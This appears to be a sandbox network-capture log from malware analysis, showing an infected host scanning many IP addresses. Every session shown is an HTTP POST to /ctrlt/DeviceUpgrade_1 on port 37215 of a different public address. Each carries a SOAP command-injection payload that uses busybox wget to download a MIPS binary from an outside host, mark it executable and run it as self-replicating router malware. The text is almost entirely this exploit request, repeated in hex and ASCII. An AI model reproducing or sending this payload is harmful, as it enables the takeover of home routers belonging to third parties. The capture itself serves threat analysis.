                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1460192.168.2.135134041.172.184.25537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.567276955 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1461192.168.2.1353984157.196.157.17837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.567384958 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1462192.168.2.1351298197.141.48.17837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.567420959 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1463192.168.2.134780041.201.71.9937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.567434072 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1464192.168.2.1356472221.64.249.12437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.567509890 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1465192.168.2.1357736157.145.42.6837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.568511009 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1466192.168.2.1335036157.205.110.18637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.568908930 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1467192.168.2.133460641.215.67.10037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.568979025 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1468192.168.2.1345330157.83.129.16937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.568999052 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1469192.168.2.1340960157.224.210.2537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.570095062 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 